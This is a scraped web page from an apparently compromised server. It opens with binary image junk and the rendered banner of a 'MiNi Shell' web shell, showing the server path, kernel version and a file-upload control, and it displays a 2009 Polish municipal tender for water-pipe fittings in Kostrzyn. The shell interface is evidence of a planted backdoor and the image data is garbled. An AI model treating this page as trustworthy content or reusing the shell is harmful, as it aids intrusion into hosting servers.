JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090313/61718-N-2009.html

<p class="kh_header"><b>Kostrzyn: Przetarg nieograniczony na sukcesywne zaopatrywanie Zakładu Komunalnego w Kostrzynie w armaturę wodociagowo-kanalizacyjną w 2oo9 r.</b><br>
<b>Numer ogłoszenia: 61718 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny , ul. Poznańska 2, 62-025 Kostrzyn, woj. wielkopolskie, tel. 0618178239, faks 061 8970908.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Administracyjna Jednostki Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na sukcesywne zaopatrywanie Zakładu Komunalnego w Kostrzynie w armaturę wodociagowo-kanalizacyjną w 2oo9 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1Rura wodociągowa PCV O 110 mm w odcinkach 6 m,łączone na uszczelki gumowe na ciśnienie min.10 bar wg normy PN-EN 1452	              600 m		
2.Trójnik żeliwny kołnierzowy O 100/80	             10 szt.
3.Trójnik żeliwny kołnierzowy O 100/100	             10 szt.
4.Kolano żeliwne kołnierzowe O 100                            	16 szt.		
5.Króciec FV O 100                            	             30 szt		
6.Króciec  RK O 100                            	             14 szt.		
7.Nasuwka PCV O 100                            	            40 szt.		
8.Dwukielich PCV O 100                            	            20 szt.		
9.Wąż PE wodociągowy O 32  na ciśnienie min.10 bar wg.PN-EN 12201-2                                 	                                     1000 m		
10.Nawiertki samo nawiercające na rurę PCV O 110/32   
Wykonanie trzpienia ze stali nierdzewnej,wiertła z mosiądzu,
Uszczelnienie zaworu pierścieniem pojedyńcze,powłoka malarska-farba olejna.                        	                                     60 szt.		
11.Obudowy teleskopowe do nawiertek	           60 szt.		
12.Skrzynka żeliwna do zasuw	                        10 szt.		
13.Skrzynka żeliwna do nawiertek średnia	           60 szt.		
14.Króciec żeliwny dwukołnierzowy O 80 L=500	           10 szt.		
15.Króciec żeliwny dwukołnierzowy O 80 L=1000	           10 szt.		
16.Wodomierze O ? cala 20 mm w klasie C	          150 szt.		
17.Wodomierze O ? cala15 mm w klasie C	           50 szt.		
18.Wodomierze O 1cal  25 mm w klasie C                         5 szt.		
19.Wodomierze O 1 ?cala 40 mmw klasie C                     5 szt.		
20.Wodomierze O 1 ?cala 32 mmw klasie C                     5 szt.		
21.Półśrubunki      O ? cala                     	           50 kpl.		
22.Półśrubunki      O ? cala                                          150 kpl.		
23.Półśrubunki      O 1 cal                                           5 kpl.		
24.Półśrubunki      O 1?cala                                          5 kpl.		
25.Półśrubunki      O 1? cala                                          5 kpl.		
26.Włazy kanalizacyjne żeliwne O 600 min.40 ton         4 szt.		
27.Przykrycia do włazów kanalizacyjnych O 600,  żeliwne min.40ton  7 szt.	
28.Kolano żeliwne kołnierzowe O 80 	                     5 szt.		
29.Łuk kołnierzowy  kąt 90o O 100 mm, PCV	        6 szt.		
30.Kolano ze stopka żeliwne O 80	                   10  szt.		
31.Kołnierz żeliwny ślepy O 80 	                    5 szt.		  
32.Kołnierz żeliwny ślepy O 100	                    5 szt.
33.Hydrant nadziemny  DN 80 z żeliwa sferoidalnego, malowane na kolor
niebieski.	                                                                  10 szt.
34.Zawory przelotowe kulowe O ? cala                       	  20 szt.		
35.Zawory przelotowe kulowe O ?cala                        	  80 szt.		
36.Zawory przelotowe kulowe O 1 cal                        	  10 szt.		
37.Zawory przelotowe kulowe O 1?cala                         	  10 szt.	
38.Zawory przelotowe kulowe O 1? cala                        	  10 szt.	
39.Zawory antyskażeniowe O ? cala                        	   50 szt.		
40.Zawory antyskażeniowe O 1cal                                     5 szt.
41.Zawory antyskażeniowe O 1?cala                                   5 szt.
42.Zawory antyskażeniowe O 1? cala                                    5 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 44.16.30.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 2. Warunki szczegółowe wymagane od wykonawców :
2.1)    Wykonawca dysponuje odpowiednim sprzętem do realizacji zakresu dostaw, objętych niniejszym zamówieniem, na które Wykonawca składa ofertę.
2.2)    Wykonawca dysponuje pracownikami posiadającymi odpowiednie kwalifikacje zawodowe.
2.3)    Wykonawca załączy:
- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.4)Wykaz wykonanych dostaw w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał z należytą starannością co najmniej dwie dostawy o charakterze i złożoności porównywalnej z zakresem zamówienia, na które wykonawca składa ofertę i o którym mowa w punkcie III niniejszej SIWZ i  dysponuje odpowiednimi referencjami lub innymi dokumentami potwierdzającymi to.
2.5)Wykonawca posiada ważną polisę ubezpieczeniową lub inny dokument ubezpieczeniowy w zakresie prowadzenia swojej działalności, związanej z przedmiotem zamówienia,
2.6.Zamawiajacy żąda złożenia w ofercie przez Wykonawcę wykazu robót przewidzianych do wykonania przez podwykonawców.
3.     Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych dokumentów na zasadzie:spełnia-nie spełnia. 
3.1.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
1)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o
których mowa w art. 22. ust.  pkt. 1-3, art. 24 ust. 1 Prawa zamówień publicznych,
2)	wykonawców,     którzy   bezpośrednio  wykonywali    czynności    związane    z    przygotowaniem     prowadzonego postępowania,   lub   posługiwali   się   w   celu   sporządzenia   oferty   osobami   uczestniczącymi   w dokonywaniu tych czynności, chyba, że udział  tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji,
3)	wykonawców,   którzy   złożyli   nieprawdziwe   informacje   mające   wpływ   na   wynik   prowadzonego
postępowania,
4)	wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub
dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy , z zastrzeżeniem art. 92 ust. 1 pkt. 3,
5)	wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą.
	Zamawiający odrzuca ofertę, jeżeli:
1)	jest  niezgodna   z   ustawą ,
2)	jej  treść   nie   odpowiada   treści   specyfikacji   istotnych   warunków  zamówienia zastrzeżeniem art. 87 ust. 2 pkt 3;
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej
konkurencji,
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6)	zawiera  błędy w obliczeniu ceny,
7)	Wykonawca w terminie 3 dni od dnia doręczenia  zawiadomienia nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust.2 pkt.3,
8)	jest nieważna na podstawie odrębnych przepisów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

1. Dokumenty wymagane:
A)formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ
B)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, tj.wystawiony po 24.09.2008 r.
C) wykaz wykonanych dostaw w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał z należytą starannością co najmniej dwa zamówienia o charakterze i złożoności porównywalnej z zakresem zamówienia, na które wykonawca składa ofertę i dysponuje odpowiednimi dokumentami  potwierdzającymi to .
D)wykonawca posiada ważną polisę ubezpieczeniową lub inny dokument ubezpieczeniowy w zakresie prowadzenia swojej działalności, związanej z przedmiotem zamówienia,
E)dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów
prawa lub innych dokumentów rejestrowych,
F)oświadczenie do postępowania o zamówienie publiczne z art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru-zawartym w załączniku nr 1 do SIWZ. Wypełniony i podpisany formularz ofertowy (zał. nr 1 do SIWZ).
G)zaparafowany wzór umowy - każda zapisana strona (zał. Nr 2 do SIWZ), jako akceptacja warunków
w niej zawartych.
H)Wykaz dostaw, których wykonanie Wykonawca zamierza powierzyć podwykonawcom..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.wlkp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny
ul.Poznanska 2
62-025 Kostrzyn
Dział Zamówień publicznych..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 09:00, miejsce: Zakład Komunalny
ul.Poznanska 2
62-025 Kostrzyn
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 22.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com